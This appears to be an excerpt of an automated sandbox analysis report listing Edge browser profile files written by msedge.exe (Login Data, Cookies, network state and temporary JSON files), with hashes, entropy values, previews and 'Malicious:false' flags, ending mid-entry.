                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):45056
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                                                                                  MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                                                                                  SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                                                                                  SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                                                                                  SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1c1e6bea-3c83-42cf-a478-269f1a8d4135.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.788754913993502
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                                                                                                                                  MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                                                                                                                                  SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                                                                                                                                  SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                                                                                                                                  SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"sts":[],"version":2}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6021e6a5-226a-4125-b331-9333bede1ab8.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\72501f02-4665-4101-9531-24e2c2b0c0c7.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\81ceea06-0502-4a48-ae2f-748c64ccd621.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1355
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.307879453487755
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:YXsZI2bZVMdBsZTbZFRudFGcsZ2ZFGJ/NsIZ6ma3yeebscZCO4iYVbG7nby:YXseg8sbfcds0gnsYleebsECxbZ
                                                                                                                                                                                                                                                                                  MD5:55C9FB69ED07E76BFDB0A00DC87CB1D1
                                                                                                                                                                                                                                                                                  SHA1:AFAEF8B003BA953A4B7FA77EC5E1EFB1F75B8C16
                                                                                                                                                                                                                                                                                  SHA-256:F519BB0520FDCAB5158BAE5A622926A0A8AEFB6624BDC849EF5E5D8DB592F032
                                                                                                                                                                                                                                                                                  SHA-512:C263CCA09F435A4AA65934C994C5FAAF5FD0598D8C23A93B2805FB5A9879CADA4EA09B16094D2E961280EC29CE5C1F9332BD41B40B27EE6A4173DDA389FE58F0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918094867619","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918097683168","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918112691999","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378419718615279","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8e15e5a3-7f6a-491c-bda3-4d8e3c42c4a6.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.136448891057489
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TsKLopF+SawLUO1Xj8BWX7/jYzv3GHVE+IUgN5VGL:te+AuWLclZs
                                                                                                                                                                                                                                                                                  MD5:9BDCB37BF4999D265B4E741938FECD16
                                                                                                                                                                                                                                                                                  SHA1:9E9D699267068CD9FD694D2960443382C903000F
                                                                                                                                                                                                                                                                                  SHA-256:11B2302800E55B7027C3343FF99BC75CFE8E725375B87D20F53E4D20CA67742A
                                                                                                                                                                                                                                                                                  SHA-512:EB026E9D08582EB29A0A46D693D685BCDD32A24C4992AA4C97FD4E49BC03ABECC44D68D15766322293D2BB5A1A397974BD423889C3E38CF2E27996DC091FE637
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF33450.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF41895.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7603868354494112
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBkKR:eIEumQv8m1ccnvS6/
                                                                                                                                                                                                                                                                                  MD5:5C02F1ABC48C0E9C68FF4BEF8EE1B343
                                                                                                                                                                                                                                                                                  SHA1:02FC6E8FEDF00793679517C50E8B8680C4BD970D
                                                                                                                                                                                                                                                                                  SHA-256:01EAD8717C2867F01A93D8920BF7415DF648C85A8C47095D9690AC4E573C28BE
                                                                                                                                                                                                                                                                                  SHA-512:4BCD0188E41AA3D1552FB54046A2A14227072A2289F09F024C30B0D48406C12F9F50E69B99788317AF71CD49F78FC08EB668C0FDDA3D0C6D417C56FDBF250FB5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF30938.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF34392.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF33440.TMP (copy)

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e6b0ef79-429d-4e0d-9817-8de0f9ce2474.tmp

                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
